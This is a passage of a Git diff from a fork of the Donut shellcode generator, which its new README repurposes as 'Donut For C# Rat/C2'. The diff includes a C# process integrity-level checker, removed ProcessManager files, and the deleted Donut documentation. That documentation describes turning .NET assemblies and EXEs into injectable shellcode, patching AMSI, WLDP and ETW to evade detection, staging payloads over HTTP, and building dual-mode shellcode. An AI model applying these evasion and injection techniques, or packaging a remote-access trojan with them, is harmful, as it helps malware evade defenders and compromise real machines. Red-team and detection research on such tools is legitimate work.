const int SECURITY_MANDATORY_MEDIUM_RID = (0x00002000);
const int SECURITY_MANDATORY_HIGH_RID = (0x00003000);
const int SECURITY_MANDATORY_SYSTEM_RID = (0x00004000);
const int SECURITY_MANDATORY_PROTECTED_PROCESS_RID = (0x00005000);
[DllImport("advapi32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
static extern bool OpenProcessToken(
IntPtr ProcessHandle,
UInt32 DesiredAccess,
out IntPtr TokenHandle
);
const UInt32 TOKEN_QUERY = 0x0008;
[DllImport("advapi32.dll", SetLastError = true)]
static extern bool GetTokenInformation(
IntPtr TokenHandle,
TOKEN_INFORMATION_CLASS TokenInformationClass,
IntPtr TokenInformation,
uint TokenInformationLength,
out uint ReturnLength
);
enum TOKEN_INFORMATION_CLASS
{
TokenUser = 1, TokenGroups, TokenPrivileges, TokenOwner, TokenPrimaryGroup, TokenDefaultDacl, TokenSource, TokenType, TokenImpersonationLevel, TokenStatistics, TokenRestrictedSids, TokenSessionId, TokenGroupsAndPrivileges, TokenSessionReference, TokenSandBoxInert, TokenAuditPolicy, TokenOrigin, TokenElevationType, TokenLinkedToken, TokenElevation, TokenHasRestrictions, TokenAccessInformation, TokenVirtualizationAllowed, TokenVirtualizationEnabled,
/// <summary>
/// The buffer receives a TOKEN_MANDATORY_LABEL structure that specifies the token's integrity level.
/// </summary>
TokenIntegrityLevel,
TokenUIAccess, TokenMandatoryPolicy, TokenLogonSid, MaxTokenInfoClass
}
public enum IntegrityLevel
{
Low, Medium, High, System, None, Unknown
}
const int ERROR_INVALID_PARAMETER = 87;
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool CloseHandle(IntPtr hHandle);
public static IntegrityLevel GetIntegrityLevel(Process process)
{
try
{
IntPtr pId = (process.Handle);
IntPtr hToken = IntPtr.Zero;
if (OpenProcessToken(pId, TOKEN_QUERY, out hToken))
{
try
{
IntPtr pb = Marshal.AllocCoTaskMem(1000);
try
{
uint cb = 1000;
if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenIntegrityLevel, pb, cb, out cb))
{
IntPtr pSid = Marshal.ReadIntPtr(pb);
int dwIntegrityLevel = Marshal.ReadInt32(GetSidSubAuthority(pSid, (Marshal.ReadByte(GetSidSubAuthorityCount(pSid)) - 1U)));
if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
{
return IntegrityLevel.Low;
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
{
// Medium Integrity
return IntegrityLevel.Medium;
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID)
{
// High Integrity
return IntegrityLevel.High;
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID)
{
// System Integrity
return IntegrityLevel.System;
}
return IntegrityLevel.None;
}
else
{
return IntegrityLevel.Unknown;
}
}
finally
{
Marshal.FreeCoTaskMem(pb);
}
}
finally
{
CloseHandle(hToken);
}
}
}
catch (Win32Exception ex)
{
return IntegrityLevel.Unknown;
}
//If we made it this far through all of the finally blocks and didn't return, then return unknown
return IntegrityLevel.Unknown;
}
}
}

36
ProcessManager/Properties/AssemblyInfo.cs
View File

@ -1,36 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("ProcessManager")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("ProcessManager")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("98ca74c7-a074-434d-9772-75896e73ceaa")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

37
ProcessManager/README.md
View File

@ -1,37 +0,0 @@
# ProcessManager
Has its own repo at: https://github.com/TheWover/ProcessManager
ps-like .NET Assembly for enumerating processes on the current machine or a remote machine (using current token). Has the unique feature of telling you whether each process is managed (has the CLR loaded). Compatible with .NET v3.5.
All enumeration is done with only built-in .NET APIs and PInvoke, rather than any third-party libraries or usage of WMI.
* PPID value of "-1" means that the parent is no longer running or is not accessible.
* Arch value of "*" means that the process could not be accessed or the architecture could not be determined. Usually a permissions issue.
* Managed value of "True" means that the CLR is loaded into the process. That is, it is a "managed" process because it is running .NET managed code.
* Integrity value of "Unknown" means exactly that.
* Blank User value means that the user information of the process could not be obtained.
**I have not tested ProcessManager's remote enumeration option. :-P Neither me nor Odzhan have a lab setup for testing that. Please feel free to let us know of any issues.**
![Alt text](https://github.com/TheWover/ProcessManager/blob/master/img/usage.JPG?raw=true "General Usage")
# Usage
```
| Process Manager [v0.2]
| Copyright (c) 2019 TheWover
Usage: ProcessManager.exe [options]
-h, --help Display this help menu.
--machine Specify a machine to query. Machine name or IP Address may be used.
--name Filter by a process name.
Examples:
ProcessManager.exe
ProcessManager.exe --name svchost
ProcessManager.exe --machine workstation2
ProcessManager.exe --machine 10.30.134.13
```

BIN
ProcessManager/img/usage.JPG
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 160 KiB

357
README.md
View File

@ -1,357 +1,10 @@
[![Issues](https://img.shields.io/github/issues/thewover/donut)](https://github.com/TheWover/donut/issues)
[![Contributors](https://img.shields.io/github/contributors/thewover/donut)](https://github.com/TheWover/donut/graphs/contributors)
[![Stars](https://img.shields.io/github/stars/thewover/donut)](https://github.com/TheWover/donut/stargazers)
[![Forks](https://img.shields.io/github/forks/thewover/donut)](https://github.com/TheWover/donut/network/members)
[![License](https://img.shields.io/github/license/thewover/donut)](https://github.com/TheWover/donut/blob/master/LICENSE)
[![Chat](https://img.shields.io/badge/chat-%23donut-orange)](https://bloodhoundgang.herokuapp.com/)
[![Github All Releases](https://img.shields.io/github/downloads/thewover/donut/total.svg)](http://www.somsubhra.com/github-release-stats/?username=thewover&repository=donut)
[![Twitter URL](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https://github.com/TheWover/donut&text=%23Donut+An+open-source+shellcode+generator+that+supports+in%2Dmemory+execution+of+VBS%2FJS%2FEXE%2FDLL+files:+https://github.com/TheWover/donut)
# Donut For C# Rat/C2
![Alt text](https://github.com/TheWover/donut/blob/master/img/donut_logo_white.jpg?raw=true "Donut Logo")
build the client with .Net Framework 3.5, and make sure the exe can be run on .Net Framework 4.0 too
<p>Current version: <a href="https://thewover.github.io/TBD/">v1</a></p>
then use this donut as the origin one
<h2>Table of contents</h2>
-r is useless now, the shellcode will use 4.0 first, if fail then 3.5
<ol>
<li><a href="#intro">Introduction</a></li>
<li><a href="#how">How It Works</a></li>
<li><a href="#build">Building</a></li>
<li><a href="#usage">Usage</a></li>
<li><a href="#subproj">Subprojects</a></li>
<li><a href="#dev">Developing with Donut</a></li>
<li><a href="#qad">Questions and Discussions</a></li>
<li><a href="#disclaimer">Disclaimer</a></li>
</ol>
<h2 id="intro">1. Introduction</h2>
<p><strong>Donut</strong> is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself. The module is optionally encrypted using the <a href="https://tinycrypt.wordpress.com/2017/02/20/asmcodes-chaskey-cipher/">Chaskey</a> block cipher and a 128-bit randomly generated key. After the file is loaded and executed in memory, the original reference is erased to deter memory scanners. The generator and loader support the following features:</p>
<ul>
<li>Compression of input files with aPLib and LZNT1, Xpress, Xpress Huffman via RtlCompressBuffer.</li>
<li>Using entropy for API hashes and generation of strings.</li>
<li>128-bit symmetric encryption of files.</li>
<li>Overwriting native PE headers.</li>
<li>Storing native PEs in MEM_IMAGE memory.</li>
<li>Patching Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP).</li>
<li>Patching Event Tracing for Windows (ETW).</li>
<li>Patching command line for EXE files.</li>
<li>Patching exit-related API to avoid termination of host process.</li>
<li>Multiple output formats: C, Ruby, Python, PowerShell, Base64, C#, Hexadecimal, and UUID string.</li>
</ul>
<p>There are dynamic and static libraries for both Linux and Windows that can be integrated into your own projects. There's also a python module which you can read more about in <a href="https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md">Building and using the Python extension.</a></p>
<h2 id="how">2. How It Works</h2>
<p>Donut contains individual loaders for each supported file type. For dotNET EXE/DLL assemblies, Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. Once the CLR is loaded into the host process, a new Application Domain is created to allow for running Assemblies in disposable AppDomains. When the AppDomain is ready, the dotNET Assembly is loaded via the AppDomain.Load_3 method. Finally, the Entry Point for EXEs or public method for DLLs specified by the user is invoked with any additional parameters. Refer to MSDN for documentation on the <a href=" https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces">Unmanaged CLR Hosting API.</a> For a standalone example of a CLR Host, refer to <a href="https://github.com/TheWover/donut/blob/master/DonutTest/rundotnet.cpp">code here.</a></p>
<p>VBScript and JScript files are executed using the IActiveScript interface. There's also minimal support for some of the methods provided by the Windows Script Host (wscript/cscript). For a standalone example, refer to <a href="https://gist.github.com/odzhan/d18145b9538a3653be2f9a580b53b063">code here.</a> For a more detailed description, read: <a href="https://modexp.wordpress.com/2019/07/21/inmem-exec-script/">In-Memory Execution of JavaScript, VBScript, JScript and XSL</a></p>
<p>Unmanaged or native EXE/DLL files are executed using a custom PE loader with support for Delayed Imports, TLS and patching the command line. Only files with relocation information are supported. Read <a href="https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/">In-Memory Execution of DLL</a> for more information.</p>
<p>The loader can disable AMSI and WLDP to help evade detection of malicious files executed in-memory. For more information, read <a href="https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/">How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code</a>. It also supports decompression of files in memory using aPLib or the RtlDecompressBuffer API. Read <a href="https://modexp.wordpress.com/2019/12/08/shellcode-compression/">Data Compression</a> for more information.</p>
<p>As of v1.0, ETW is also bypassed. Like with AMSI/WLDP, this a modular system that allows you to swap out the default bypass with your own. The default bypass is derived from research by XPN. Read <a href="https://blog.xpnsec.com/hiding-your-dotnet-etw/">Hiding your .NET - ETW</a> for more information.</p>
<p>By default, the loader will overwrite the PE headers of unmanaged PEs (from the base address to `IMAGE_OPTIONAL_HEADER.SizeOfHeaders`). If no decoy module is used (module overloading), then the PE headers will be zeroed. If a decoy module is used, the PE headers of the decoy module will be used to overwrite those of the payload module. This is to deter detection by comparing the PE headers of modules in memory with the file backing them on disk. The user may request that all PE headers be preserved in their original state. This is helpful for scenarios when the payload module needs to access its PE headers, such as when looking up embedded PE resources.</p>
<p>For a detailed walkthrough using the generator and how Donut affects tradecraft, read <a href="https://thewover.github.io/Introducing-Donut/">Donut - Injecting .NET Assemblies as Shellcode</a>. For more information about the loader, read <a href="https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/">Loading .NET Assemblies From Memory</a>.</p>
<p>Those who wish to know more about the internals should refer to <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">Developer notes.</a></p>
<h2 id="build">3. Building</h2>
<p>There are two types of build. If you want to debug Donut, please refer to <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">documentation here</a>. If not, continue reading for the release build.</p>
<h3><strong>Clone</strong></h3>
<p>From a Windows command prompt or Linux terminal, clone the repository.</p>
<pre>
git clone http://github.com/thewover/donut.git
</pre>
<p>The next step depends on your operating system and what compiler you decide to use. Currently, the generator and loader template for Donut can be compiled successfully with both Microsoft Visual Studio 2019 and MingGW-64. To use the libraries in your own C/C++ project, please refer to the <a href="https://github.com/TheWover/donut/tree/master/examples">examples provided here.</a></p>
<h4><strong>Windows</strong></h4>
<p>To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:</p>
<pre>
nmake -f Makefile.msvc
</pre>
<p>To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:</p>
<pre>
make -f Makefile.mingw
</pre>
<h4><strong>Linux</strong></h4>
<p>To generate the dynamic library donut.so, the static library donut.a and the generator donut. Change to the directory where you cloned the Donut repository and simply type make.</p>
<h3>Python Module</h3>
<p>Donut can be installed and used as a Python module. To install from source requires pip for Python3. First, ensure older versions of donut-shellcode are not installed by issuing the following command on Linux terminal or Microsoft Visual Studio command prompt.</p>
<pre>
pip3 uninstall donut-shellcode
</pre>
<p>After you confirm older versions are no longer installed, issue the following command.</p>
<pre>
pip3 install .
</pre>
<p>You may also install Donut as a Python module by grabbing it from the PyPi repository.</p>
<pre>
pip3 install donut-shellcode
</pre>
<p>For more information, please refer to <a href="https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md">Building and using the Python extension.</a></p>
<h3>Docker</h3>
<p>Building the docker container.</p>
<pre>
docker build -t donut .
</pre>
<p>Running donut.</p>
<pre>
docker run -it --rm -v "${PWD}:/workdir" donut -h
</pre>
<h3>Support Tools</h3>
<p>Donut includes several other executables that may be built separately. This include "hash.exe", "encrypt.exe","inject.exe", and "inject_local.exe". The first two are used in shellcode generation. The latter two are provided to assist with testing donut shellcode. "inject.exe" will inject a raw binary file (loader.bin) into a process by its PID or process name. "inject_local.exe" will inject a raw binary file into its own process.</p>
<p>To build these support executables separately you may use the MSVC makefile. For example, to build "inject_local.exe" to test your donut shellcode, you may run.</p>
<pre>
nmake inject_local -f Makefile.msvc
</pre>
<h3>Releases</h3>
<p>Tags have been provided for each release version of Donut that contain the compiled executables.</p>
<ul>
<li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.3">v0.9.3, TBD</a></li>
<li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.2">v0.9.2, Bear Claw</a></li>
<li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.1">v0.9.1, Apple Fritter</a></li>
<li><a href="https://github.com/TheWover/donut/releases/tag/v0.9">v0.9.0, Initial Release</a></li>
</ul>
<p>Currently, there are two other generators available.</p>
<ul>
<li><a href="https://github.com/n1xbyte/donutCS">C# generator by n1xbyte</a></li>
<li><a href="https://github.com/Binject/go-donut">Go generator by awgh</a></li>
</ul>
<h2 id="usage">4. Usage</h2>
<p>The following table lists switches supported by the command line version of the generator.</p>
<table border="1">
<tr>
<th>Switch</th>
<th>Argument</th>
<th>Description</th>
</tr>
<tr>
<td><strong>-a</strong></td>
<td><var>arch</var></td>
<td>Target architecture for loader : 1=x86, 2=amd64, 3=x86+amd64(default).</td>
</tr>
<tr>
<td><strong>-b</strong></td>
<td><var>level</var></td>
<td>Behavior for bypassing AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)</td>
</tr>
<tr>
<td><strong>-k</strong></td>
<td><var>headers</var></td>
<td>Preserve PE headers. 1=Overwrite (default), 2=Keep all</td>
</tr>
<tr>
<td><strong>-j</strong></td>
<td><var>decoy</var></td>
<td>Optional path of decoy module for Module Overloading.</td>
</tr>
<tr>
<td><strong>-c</strong></td>
<td><var>class</var></td>
<td>Optional class name. (required for .NET DLL) Can also include namespace: e.g <em>namespace.class</em></td>
</tr>
<tr>
<td><strong>-d</strong></td>
<td><var>name</var></td>
<td>AppDomain name to create for .NET. If entropy is enabled, one will be generated randomly.</td>
</tr>
<tr>
<td><strong>-e</strong></td>
<td><var>level</var></td>
<td>Entropy level. 1=None, 2=Generate random names, 3=Generate random names + use symmetric encryption (default)</td>
</tr>
<tr>
<td><strong>-f</strong></td>
<td><var>format</var></td>
<td>The output format of loader saved to file. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=PowerShell, 7=C#, 8=Hexadecimal</td>
</tr>
<tr>
<td><strong>-m</strong></td>
<td><var>name</var></td>
<td>Optional method or function for DLL. (a method is required for .NET DLL)</td>
</tr>
<tr>
<td><strong>-n</strong></td>
<td><var>name</var></td>
<td>Module name for HTTP staging. If entropy is enabled, one is generated randomly.</td>
</tr>
<tr>
<td><strong>-o</strong></td>
<td><var>path</var></td>
<td>Specifies where Donut should save the loader. Default is "loader.bin" in the current directory.</td>
</tr>
<tr>
<td><strong>-p</strong></td>
<td><var>parameters</var></td>
<td>Optional parameters/command line inside quotations for DLL method/function or EXE.</td>
</tr>
<tr>
<td><strong>-r</strong></td>
<td><var>version</var></td>
<td>CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.</td>
</tr>
<tr>
<td><strong>-s</strong></td>
<td><var>server</var></td>
<td>URL for the HTTP server that will host a Donut module. Credentials may be provided in the following format: <pre>https://username:password@192.168.0.1/</pre></td>
</tr>
<tr>
<td><strong>-t</strong></td>
<td></td>
<td>Run the entrypoint of an unmanaged/native EXE as a thread and wait for thread to end.</td>
</tr>
<tr>
<td><strong>-w</strong></td>
<td></td>
<td>Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)</td>
</tr>
<tr>
<td><strong>-x</strong></td>
<td><var>option</var></td>
<td>Determines how the loader should exit. 1=exit thread (default), 2=exit process, 3=Do not exit or cleanup and block indefinitely</td>
</tr>
<tr>
<td><strong>-y</strong></td>
<td><var>addr</var></td>
<td>Creates a new thread for the loader and continues execution at an address that is an offset relative to the host process's executable. The value provided is the offset. This option supports loaders that wish to resume execution of the host process after donut completes execution.</td>
</tr>
<tr>
<td><strong>-z</strong></td>
<td><var>engine</var></td>
<td>Pack/Compress the input file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress, 5=Xpress Huffman. Currently, the last three are only supported on Windows.</td>
</tr>
</table>
<h3 id="requirements">Payload Requirements</h2>
<p>There are some specific requirements that your payload must meet in order for Donut to successfully load it.</p>
<h3 id="requirements-dotnet">.NET Assemblies</h2>
<ul>
<li>The entry point method must only take strings as arguments, or take no arguments.</li>
<li>The entry point method must be marked as public and static.</li>
<li>The class containing the entry point method must be marked as public.</li>
<li>The Assembly must NOT be a Mixed Assembly (contain both managed and native code).</li>
<li>As such, the Assembly must NOT contain any Unmanaged Exports.</li>
</ul>
<h3 id="requirements-native">Native EXE/DLL</h2>
<ul>
<li>Binaries built with Cygwin are unsupported.</li>
</ul>
<p>Cygwin executables use initialization routines that expect the host process to be running from disk. If executing from memory, the host process will likely crash.</p>
<h3 id="requirements-dotnet">Unmanaged DLLs</h2>
<ul>
<li>A user-specified entry point method must only take a string as an argument, or take no arguments. We have provided an <a href="https://github.com/TheWover/donut/blob/master/DonutTest/dlltest.c/">example</a>.</li>
</ul>
<h2 id="subproj">5. Subprojects</h2>
<p>There are four companion projects provided with donut:</p>
<table border="1">
<tr>
<th>Tool</th>
<th>Description</th>
</tr>
<tr>
<td>DemoCreateProcess</td>
<td>A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.</td>
</tr>
<tr>
<td>DonutTest</td>
<td>A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.</td>
</tr>
<tr>
<td>ModuleMonitor</td>
<td>A proof-of-concept tool that detects CLR injection as it is done by tools such as Donut and Cobalt Strike's execute-assembly.</td>
</tr>
<tr>
<td>ProcessManager</td>
<td>A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. </td>
</tr>
</table>
<h2 id="dev">6. Developing with Donut</h2>
<p>You may want to add support for more types of payloads, change our feature set, or integrate Donut into your existing tooling. We have provided <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">developer documentation</a>. Additional features are left as exercises to the reader. Our suggestions:</p>
<ul>
<li>Add environmental keying.</li>
<li>Make Donut polymorphic by obfuscating the loader every time shellcode is generated.</li>
<li>Integrate Donut as a module into your favorite RAT/C2 Framework.</li>
</ul>
<h2 id="qad">7. Questions and Discussion</h2>
<p>If you have any questions or comments about Donut. Join the #Donut channel in the <a href="https://bloodhoundgang.herokuapp.com/">BloodHound Gang Slack</a></p>
<h2 id="disclaimer">8. Disclaimer</h2>
<p>We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection and in-memory loading through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. In the event EDR or AV products are capable of detecting Donut via signatures or behavioral patterns, we will not update Donut to counter signatures or detection methods. To avoid being offended, please do not ask.</p>
All in one, you can get a shellcode that can be use on both .Net Framework 3.5/4.x

160
docs/2019-08-21-Python_Extension.md
View File

@ -1,160 +0,0 @@
# Python Extension
A Python C extension is now available which allows you to dynamically generate donut shellcode in Python.
## Requirements
The extension has only been tested in Python 3.7, it shouldn't have any compatibility issues with older 3.X versions of Python.
It will ***not*** work in Python 2.x.
## Installing the Extension
(Once the extension has been published to PyPi)
```
pip3 install donut-shellcode
```
## Manually Compiling And Installing the Extension
```bash
git clone https://github.com/TheWover/donut && cd donut
pip3 install . # or python setup.py install
```
## Usage
The Python extension accepts the same parameters as the main donut executable.
Here's a minimalistic example of using the extension:
```python
import donut
shellcode = donut.create(file="naga.exe", params='https://172.16.164.1/')
```
The ```donut``` module exposes only one function ```create()```, which is used to generate shellcode and accepts both positional and keyword arguments.
The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS file to turn into shellcode.
```python
import donut
shellcode = donut.create(
file='naga.exe', # .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory
url='http://127.0.0.1', # HTTP server that will host the donut module
arch=1, # Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default)
bypass=3, # Bypass AMSI/WLDP : 1=none, 2=abort on fail, 3=continue on fail.(default)
cls='namespace.class', # Optional class name. (required for .NET DLL)
method='method', # Optional method or API name for DLL. (method is required for .NET DLL)
params='arg1 arg2', # Optional parameters or command line.
runtime='version', # CLR runtime version. MetaHeader used by default or v4.0.30319 if none available
appdomain='name' # AppDomain name to create for .NET. Randomly generated by default.
)
```
## Keywords
The following table lists key words for the create method.
<table>
<tr>
<th>Keyword</th>
<th>Type</th>
<th>Description</th>
</tr>
<tr>
<td>file</td>
<td>String</td>
<td>The path of file to execute in memory. VBS/JS/EXE/DLL files are supported.</td>
</tr>
<tr>
<td>arch</td>
<td>Integer</td>
<td>Indicates the type of assembly code to generate. 1=<code>DONUT_ARCH_X86</code> and 2=<code>DONUT_ARCH_X64</code> are self-explanatory. 3=<code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both X86 and AMD64. ARM64 will be supported at some point.</td>
</tr>
<tr>
<td>bypass</td>
<td>Integer</td>
<td>Specifies behaviour of the code responsible for bypassing AMSI and WLDP. The current options are 1=<code>DONUT_BYPASS_NONE</code> which indicates that no attempt be made to disable AMSI or WLDP. 2=<code>DONUT_BYPASS_ABORT</code> indicates that failure to disable should result in aborting execution of the module. 3=<code>DONUT_BYPASS_CONTINUE</code> indicates that even if AMSI/WDLP bypasses fail, the shellcode will continue with execution.</td>
</tr>
<tr>
<td>compress</td>
<td>Integer</td>
<td>Indicates if the input file should be compressed. Available engines are 1=<code>DONUT_COMPRESS_NONE</code>, 2=<code>DONUT_COMPRESS_APLIB</code> to use the <a href="http://ibsensoftware.com/products_aPLib.html">aPLib</a> algorithm. For builds on Windows, the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcompressbuffer">RtlCompressBuffer</a> API is available and supports 3=<code>DONUT_COMPRESS_LZNT1</code>, 4=<code>DONUT_COMPRESS_XPRESS</code> and 5=<code>DONUT_COMPRESS_XPRESS_HUFF</code>.</td>
</tr>
<tr>
<td>entropy</td>
<td>Integer</td>
<td>Indicates whether Donut should use entropy and/or encryption for the loader to help evade detection. Available options are 1=<code>DONUT_ENTROPY_NONE</code>, 2=<code>DONUT_ENTROPY_RANDOM</code>, which generates random strings and 3=<code>DONUT_ENTROPY_DEFAULT</code> that combines <code>DONUT_ENTROPY_RANDOM</code> with symmetric encryption.</td>
</tr>
<tr>
<td>format</td>
<td>Integer</td>
<td>Specifies the output format for the shellcode loader. Supported formats are 1=<code>DONUT_FORMAT_BINARY</code>, 2=<code>DONUT_FORMAT_BASE64</code>, 3=<code>DONUT_FORMAT_RUBY</code>, 4=<code>DONUT_FORMAT_C</code>, 5=<code>DONUT_FORMAT_PYTHON</code>, 6=<code>DONUT_FORMAT_POWERSHELL</code>, 7=<code>DONUT_FORMAT_CSHARP</code> and 8=<code>DONUT_FORMAT_HEX</code>. On Windows, the base64 string is copied to the clipboard.</td>
</tr>
<tr>
<td>exit_opt</td>
<td>Integer</td>
<td>When the shellcode ends, <code>RtlExitUserThread</code> is called, which is the default behaviour. Use 2=<code>DONUT_OPT_EXIT_PROCESS</code> to terminate the host process via the <code>RtlExitUserProcess</code> API. Use 3=<code>DONUT_OPT_EXIT_BLOCK</code> to not exit or cleanup and instead block indefinitely.</td>
</tr>
<tr>
<td>thread</td>
<td>Integer</td>
<td>If the file is an unmanaged EXE, the loader will run the entrypoint as a thread. The loader also attempts to intercept calls to exit-related API stored in the Import Address Table by replacing those pointers with the address of the <code>RtlExitUserThread</code> API. However, hooking via IAT is generally unreliable and Donut may use code splicing / hooking in the future.</td>
</tr>
<tr>
<td>oep</td>
<td>String</td>
<td>Tells the loader to create a new thread before continuing execution at the OEP provided by the user. Address should be in hexadecimal format.</td>
</tr>
<tr>
<td>output</td>
<td>String</td>
<td>The path of where to save the shellcode/loader. Default is "loader.bin".</td>
</tr>
<tr>
<td>runtime</td>
<td>String</td>
<td>The CLR runtime version to use for a .NET assembly. If none is provided, Donut will try reading from the PE's COM directory. If that fails, v4.0.30319 is used by default.</td>
</tr>
<tr>
<td>appdomain</td>
<td>String</td>
<td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
</tr>
<tr>
<td>cls</td>
<td>String</td>
<td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</td>
</tr>
<tr>
<td>method</td>
<td>String</td>
<td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
</tr>
<tr>
<td>params</td>
<td>String</td>
<td>List of parameters for the .NET method or DLL function. For unmanaged EXE files, a 4-byte string is generated randomly to act as the module name. If entropy is disabled, this will be "AAAA"</td>
</tr>
<tr>
<td>unicode</td>
<td>Integer</td>
<td>By default, the <code>params</code> string is passed to an unmanaged DLL function as-is, in ANSI format. If set, param is converted to UNICODE.</td>
</tr>
<tr>
<td>url or server</td>
<td>String</td>
<td>If the instance type is <code>DONUT_INSTANCE_HTTP</code>, this should contain the server and path of where module will be stored. e.g: https://www.staging-server.com/modules/</td>
</tr>
<tr>
<td>modname</td>
<td>String</td>
<td>If the type is <code>DONUT_INSTANCE_HTTP</code>, this will contain the name of the module for where to save the contents of <code>mod</code> to disk. If none is provided by the user, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
</tr>
</table>
## Author
The Python extension was written by [@byt3bl33d3r](https://twitter.com/byt3bl33d3r)

154
docs/2019-5-31-Apple-Fritter.md
View File

@ -1,154 +0,0 @@
---
layout: post
title: Donut v0.9.1 "Apple Fritter" - Dual-Mode Shellcode, AMSI, and More
---
*TLDR: Version v0.9.1 "Apple Fritter" of Donut has been released, including dual-mode (AMD64+x86) shellcode, AMSI bypassing for .NET v4.8, automatic version detection of payloads, better support for Program.Main().*
# Introduction
In case you are unaware, [Donut](https://github.com/TheWover/donut "Donut") is a shellcode generation tool that creates native shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
Today, we released version v0.9.1. The major features include:
* Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes.
* Automatic detection of the CLR version required for .NET Assembly payloads.
* AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded.
* Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags.
* Bypass for Device Guard policy preventing execution of dynamically generated .NET code
* Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings
# Feature Breakdown
## Dual-Mode Shellcode
Odzhan knew an old trick for crafting shellcode that can run in either x86 or x64 Windows processes using REX prefixes. We combine the x86 and x64 shellcode with a stub that "detects" the architecture of the process. The layout in memory looks like:
```
--------------------------------------------------
| detection stub | x64 shellcode | x86 shellcode |
--------------------------------------------------
```
And the logic:
```assembly
0x31C0 xor eax, eax // null eax
0x48 dec eax // decrement eax to produce an underflow
0x0F88 js dword x86_code // jump to x86 payload if we are in a WOW64 process
<x64_code> // the x64 PIC machine code for the payload
<x86_code> // the x86 PIC machine code for the payload
```
There are two ways this code can execute.
If the process is WOW64 (x86):
1) ```eax``` will be nulled.
